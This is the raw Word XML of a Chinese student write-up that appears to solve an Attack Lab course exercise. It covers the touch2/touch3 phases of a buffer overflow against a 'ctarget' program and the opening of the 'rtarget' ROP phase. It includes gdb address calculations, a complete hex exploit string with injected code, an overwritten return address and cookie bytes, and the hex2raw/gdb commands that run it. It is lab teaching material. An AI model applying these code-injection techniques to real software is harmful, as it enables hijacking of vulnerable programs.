        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没满用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0注满）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17675FF7" w14:textId="77F53E56" w:rsidR="00BD572A" w:rsidRDefault="00BD572A">
      <w:r w:rsidRPr="00BD572A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="434B81A8" wp14:editId="3D1F316C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1620578</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>45431</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1873346" cy="1327218"/>
            <wp:effectExtent l="0" t="0" r="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B3659" w14:textId="11BC1819" w:rsidR="00BD572A" w:rsidRDefault="00BD572A"/>
    <w:p w14:paraId="204F345A" w14:textId="4337782C" w:rsidR="00BD572A" w:rsidRDefault="00BD572A"/>
    <w:p w14:paraId="7E699E31" w14:textId="6B8D6125" w:rsidR="00BD572A" w:rsidRDefault="00BD572A"/>
    <w:p w14:paraId="1092FAE1" w14:textId="57F21C6D" w:rsidR="00BD572A" w:rsidRDefault="00BD572A"/>
    <w:p w14:paraId="6A78DC67" w14:textId="77777777" w:rsidR="00BD572A" w:rsidRDefault="00BD572A"/>
    <w:p w14:paraId="1F1F2FAB" w14:textId="487839A0" w:rsidR="00BD572A" w:rsidRDefault="00BD572A"/>
    <w:p w14:paraId="13AAE53D" w14:textId="20BE7405" w:rsidR="00590EF8" w:rsidRDefault="00BD572A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后回到缓冲区起始地址，注意</w:t>
      </w:r>
      <w:r w:rsidR="005B6CA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x0000</w:t>
      </w:r>
      <w:r w:rsidR="005B6CA8">
        <w:t>555555555</w:t>
      </w:r>
      <w:r w:rsidR="005B6CA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="005B6CA8">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="005B6CA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a将%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B6CA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B6CA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>减去8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以设置断点得到的</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值比真实多8</w:t>
      </w:r>
      <w:r w:rsidR="00FF5642">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（我将断点打在了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF5642">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>getbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF5642">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4AF6C1" w14:textId="45759D49" w:rsidR="00FF5642" w:rsidRDefault="00FF5642">
      <w:r w:rsidRPr="00FF5642">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B37945D" wp14:editId="1FFE84C8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1866900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>34002</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1187511" cy="298465"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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F843B" w14:textId="6E139853" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="31F6B520" w14:textId="5F07C20F" w:rsidR="00590EF8" w:rsidRDefault="00590EF8"/>
    <w:p w14:paraId="7BE25AEA" w14:textId="35C6BB6B" w:rsidR="00C511FE" w:rsidRDefault="00FF5642">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>556679</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – 8 = 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>55667978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小端法</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入answer中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C4EF8F" w14:textId="61FC4291" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642">
      <w:r>
        <w:t xml:space="preserve">cat answer2.txt </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>| .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/hex2raw &gt; answer2_raw1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE1373D" w14:textId="2592B016" w:rsidR="00590EF8" w:rsidRDefault="00FF5642" w:rsidP="00FF5642">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -ex 'run -q &lt; answer2_raw1.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779F5B1" w14:textId="6CD33587" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="0BCCB0E5" w14:textId="62452DBA" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="46AAEBFA" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642">
      <w:r>
        <w:t>Touc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262BA4CC" w14:textId="16F5798F" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642">
      <w:r w:rsidRPr="00FF5642">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="279D85A9" wp14:editId="2C826008">
            <wp:extent cx="5264421" cy="44579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EAD1" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="7506436B" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="0C554481" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="3E31BA3E" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="14C2AAE7" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="0B23133F" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="5BA61B9F" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="0E7E8466" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="26A9E42B" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="5EA3186A" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="31EC8FB2" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="5B517CCC" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="602D95D8" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="4FDA6359" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="08222C0C" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="22006C41" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="0545AD51" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="5D16BCA3" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="4C4FAC9B" w14:textId="77777777" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="7DB97F04" w14:textId="504AA9C6" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="5B5FEB5E" w14:textId="09D55835" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="58A5A1AC" w14:textId="65383B11" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="393EF77C" w14:textId="3FA910A3" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="53F006B8" w14:textId="36E4E7A3" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF5642">
        <w:t>touch3也需要传入cookie但是要求以字符串的形式传入。和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF5642">
        <w:t>的区别是touch3的参数是cookie的字符串地址， 寄存器%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>存储cookie字符串的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7D0B4" w14:textId="17F0CDFD" w:rsidR="00FF5642" w:rsidRPr="00B27A32" w:rsidRDefault="00FF5642" w:rsidP="00FF5642">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF5642">
        <w:t>touch3的起始地址为0x</w:t>
      </w:r>
      <w:r>
        <w:t>00005555555560</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00C511FE">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF5642">
        <w:t>。因为在函数中调用了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>hexmatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>函数，</w:t>
      </w:r>
      <w:r w:rsidR="00C511FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该函数占用了内存空间</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF5642">
        <w:t>，如果cookie存储在缓冲区内会被覆盖掉，因此通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>查看调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>hexmatch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>后</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>栈</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FF5642">
        <w:t>顶地址为</w:t>
      </w:r>
      <w:r w:rsidR="00102B1F">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00102B1F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x556679</w:t>
      </w:r>
      <w:r w:rsidR="00102B1F">
        <w:t>b8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C19CB86" w14:textId="54A18BBA" w:rsidR="00FF5642" w:rsidRPr="000A5354" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="547A3350" w14:textId="1F9947BB" w:rsidR="00FF5642" w:rsidRDefault="00C511FE" w:rsidP="00FF5642">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E133BC0" w14:textId="049B9577" w:rsidR="00FF5642" w:rsidRDefault="00C511FE" w:rsidP="00FF5642">
      <w:r w:rsidRPr="00C511FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3ECB2A5D" wp14:editId="66A4709C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1101090</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>12700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2222500" cy="692150"/>
            <wp:effectExtent l="0" t="0" r="635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C1102" w14:textId="66452ED9" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00FF5642"/>
    <w:p w14:paraId="072332B9" w14:textId="6C5D884B" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00FF5642"/>
    <w:p w14:paraId="1BB84634" w14:textId="6D6CE342" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="76ABA11F" w14:textId="285F485B" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -c attack2.s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F667B0" w14:textId="31A14B99" w:rsidR="00FF5642" w:rsidRDefault="00C511FE" w:rsidP="00FF5642">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d attack2.o &gt; attack2.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00C511FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C310F54" wp14:editId="22D8CF87">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>872836</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>157307</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3213265" cy="831893"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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AEC62" w14:textId="13DDECCC" w:rsidR="00FF5642" w:rsidRDefault="008E58F8" w:rsidP="00FF5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4C4DF5" wp14:editId="63EA32CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3848100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>14605</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2327275" cy="262255"/>
                <wp:effectExtent l="0" t="0" r="0" b="444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79F76" w14:textId="760D8289" w:rsidR="00C511FE" w:rsidRDefault="008E58F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x556679b0+8</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t>，存字符串的地址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C4DF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3pt;margin-top:1.15pt;width:183.2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" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6EF79F76" w14:textId="760D8289" w:rsidR="00C511FE" w:rsidRDefault="008E58F8">
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>0</w:t>
                      </w:r>
                      <w:r>
                        <w:t>x556679b0+8</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t>，存字符串的地址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2D5FB1" w14:textId="6D961BCC" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="4B0708E8" w14:textId="550214BA" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="216400B9" w14:textId="147C8F9A" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="099DCAFC" w14:textId="4CFF3896" w:rsidR="00FF5642" w:rsidRDefault="00C511FE" w:rsidP="00FF5642">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以answer</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B3CD01" w14:textId="77777777" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">48 c7 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>c7</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> b8 79 66 55 48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC5C95" w14:textId="77777777" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
      </w:pPr>
      <w:r>
        <w:t>be 69 60 55 55 55 55 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220882F8" w14:textId="77777777" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
      </w:pPr>
      <w:r>
        <w:t>00 56 c3 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B951878" w14:textId="77777777" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D88C28" w14:textId="77777777" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B85CF32" w14:textId="77777777" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676A83E2" w14:textId="21DF06EA" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
      </w:pPr>
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04190080" w14:textId="78BA1CA3" w:rsidR="00C511FE" w:rsidRPr="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C511FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>//以上包含注入代码填充满整个缓冲区(56字节)从而溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C526351" w14:textId="511FD8BD" w:rsidR="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
      </w:pPr>
      <w:r>
        <w:t>78 79 66 55 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCA9FB4" w14:textId="1BCE8844" w:rsidR="00C511FE" w:rsidRPr="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C511FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C511FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/用缓冲区的起始地址覆盖原先的返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB1182" w14:textId="5D4E60B5" w:rsidR="00FF5642" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
      </w:pPr>
      <w:r>
        <w:t>34 30 39 30 61 31 37 37 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0EEF3" w14:textId="061852D3" w:rsidR="00C511FE" w:rsidRPr="00C511FE" w:rsidRDefault="00C511FE" w:rsidP="00C511FE">
      <w:pPr>
        <w:ind w:leftChars="1100" w:left="2310"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C511FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C511FE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C511FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cookie值的ASCII码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C74E16B" w14:textId="3AF89D50" w:rsidR="00FF5642" w:rsidRDefault="00FF5642" w:rsidP="00FF5642"/>
    <w:p w14:paraId="6EB7DEED" w14:textId="61ECF621" w:rsidR="00FF5642" w:rsidRDefault="00776D9B" w:rsidP="00FF5642">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AAB3BF5" w14:textId="7483BAB2" w:rsidR="00776D9B" w:rsidRDefault="00776D9B" w:rsidP="00FF5642">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rtarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="444727AE" w14:textId="66587272" w:rsidR="007F6F1D" w:rsidRDefault="007F6F1D" w:rsidP="007F6F1D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CA07A3" w14:textId="77777777" w:rsidR="007F6F1D" w:rsidRDefault="007F6F1D" w:rsidP="007F6F1D">
      <w:r>
        <w:t>1、只能使用前八个x86-64寄存器 %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7993F8B7" w14:textId="77777777" w:rsidR="007F6F1D" w:rsidRDefault="007F6F1D" w:rsidP="007F6F1D">
      <w:r>
        <w:t xml:space="preserve">2、只能使用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>movq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">， </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>popq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">， ret， </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>的 gadget；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9E3C9D" w14:textId="3CB9721A" w:rsidR="00776D9B" w:rsidRDefault="007F6F1D" w:rsidP="007F6F1D">
      <w:r>
